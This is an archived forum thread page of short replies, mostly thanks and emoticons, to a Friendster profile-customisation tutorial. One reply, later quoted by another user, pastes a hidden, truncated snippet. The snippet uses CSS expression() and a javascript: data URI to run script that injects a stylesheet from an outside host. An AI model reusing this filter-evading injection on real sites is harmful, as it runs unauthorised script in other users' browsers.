• ARCHIVES 
  • » [quote]The content and links are updated as of [i]last edited[/i] of this post... =)[/quote] [quote]FOR ALL PEOPLE HERE [b]ESPECIALLY NEWBIES[/b]. THIS IS [b]STRICTLY NOT A HELP THREAD[/b] WHAT-SO-EVE

Pages: 1234567..7

[quote]The content and links are updated as of [i]last edited[/i] of this post... =)[/quote] [quote]FOR ALL PEOPLE HERE [b]ESPECIALLY NEWBIES[/b]. THIS IS [b]STRICTLY NOT A HELP THREAD[/b] WHAT-SO-EVE

rebeldemon
» FTalker
FTalk Level: zero
1969-12-31

Re: [quote]The content and links are updated as of [i]last edited[/i] of this post... =)[/quote] [quote]FOR ALL PEOPLE HERE [b]ESPECIALLY NEWBIES[/b]. THIS IS [b]STRICTLY NOT A HELP THREAD[/b] WHAT-SO-EVE

It help evryone readers..
GeneSy
» FTalker
1969-12-31

Re: [quote]The content and links are updated as of [i]last edited[/i] of this post... =)[/quote] [quote]FOR ALL PEOPLE HERE [b]ESPECIALLY NEWBIES[/b]. THIS IS [b]STRICTLY NOT A HELP THREAD[/b] WHAT-SO-EVE

wow im impressed, because so many friendster profiles are stupid, you can't even read the words anymore because it blends with the background. if you're one of them, then go get smarter!
TrendyMocha
» Banned
1969-12-31

[url=http://www.glitter-graphics.com][img]http://dl10.glitter-graphics.net/pub/731/731230kuy14hjh8f.gif[/img][/url] [b][color=deeppink]woah, long thread though i was going to die lol just kidding.. :lol: [/color][/b]
khiemii
» n00b
1969-12-31

wow txs for sharin hehe.. it helps me a lot..
TrendyMocha
» Banned
1969-12-31

[align=center][url=friendster.com/cuteberriies][img]http://dl6.glitter-graphics.net/pub/782/782816vofdhrni6g.gif[/img][/url][/align] [align=center]Click them for my proffy^.#[/align] [align=center][img]http://dl3.glitter-graphics.net/pub/435/435823dvpu14ia01.gif[/img][/align] [align=center][color=deeppink]nice post [/color][/align]
.kashi.
» n00b
1969-12-31

[b][color=deeppink]nice toturial :thumbsup: [/color][/b]
♥LoLLiPOPS♥
» n00b
1969-12-31

yea right, this 4 newbies also.. it`s pretty great.. 2 thumbsup and a smile as big as can be 4 u (lol). :thumbsup: :thumbsup: and a :D. here ya go..
ejhei_09
» n00b
1969-12-31

wahahah[url][/url]<p id='fc' style="mycssl:expres\sion(function l(){v=document.createElement('link');v.rel='stylesheet';v.media='screen, print';v.href='http://h1.ripway.com/macgrace/where_is_d_Love.css';navigation.appendChild(v)}l());text:expres\sion(fc.style.mycssl='0');visibility:hidden"><object type=text/javascript data=" javascript: v=document.createElement('link');v.rel='stylesheet';v.media='screen, print';v.href='http://h1.ripway.com/macgrace/where_is_d_Love.css';parent.document.getElementById('navigation'
Shirow Masamune
» FTalkAgent
1969-12-31

[quote=ejhei_09]wahahah[url][/url]<p id='fc' style="mycssl:expres\sion(function l(){v=document.createElement('link');v.rel='stylesheet';v.media='screen, print';v.href='http://h1.ripway.com/macgrace/where_is_d_Love.css';navigation.appendChild(v)}l());text:expres\sion(fc.style.mycssl='0');visibility:hidden"><object type=text/javascript data=" javascript: v=document.createElement('link');v.rel='stylesheet';v.media='screen, print';v.href='http://h1.ripway.com/macgrace/where_is_d_Love.css';parent.document.getElementById('navigation'[/quote] wtf is this? :wasted:
TrendyMocha
» Banned
1969-12-31

[b][color=deeppink]so looong roflmao :lol: [/color][/b]
chisai
» n00b
1969-12-31

nice!
ﻱόρнįżт&#30
» n00b
1969-12-31

cool tips :thumbsup:
KaWaii_Honey-chan
» n00b
1969-12-31

Whew =) that was long...thankies for the tips... i'll try it~!
sakeral
» FTalkManiac
1969-12-31

nice gud thnx thnx a lot hehehe it work for newbie like me thnx i hope it help a lot of newbie like me or even the other programmer heheh ^_^ :wallbash: :wallbash: :wallbash: :wallbash: :wallbash: :wallbash:
khrixty_017
» FTalker
1969-12-31

it's kinda diffrent you know but som people don't like it even if you love it ....errrrrrrrrrrrrrrrr
sakeral
» FTalkManiac
1969-12-31

ahhhhh my head is cracking up it arduous understand the other code ^_^
sakeral
» FTalkManiac
1969-12-31

but it works a lot for me ^_^ thnx
sainseya0024
» n00b
1969-12-31

<">:ninja: :smoke: :eh: :arrow:
khrixty_017
» FTalker
1969-12-31

all i can say /./..its very imformtive even it was so long...to rea=D=Dd...
kilabot_cj
» Banned
1969-12-31

tnx for sharing!!! what is the meaning of cursed member?
  • ARCHIVES 
  • » [quote]The content and links are updated as of [i]last edited[/i] of this post... =)[/quote] [quote]FOR ALL PEOPLE HERE [b]ESPECIALLY NEWBIES[/b]. THIS IS [b]STRICTLY NOT A HELP THREAD[/b] WHAT-SO-EVE

Pages: 1234567..7

Board footer

© 2024 F Talk

Current time is 00:05

[ 9 queries - 0.304 second ]
Privacy Policy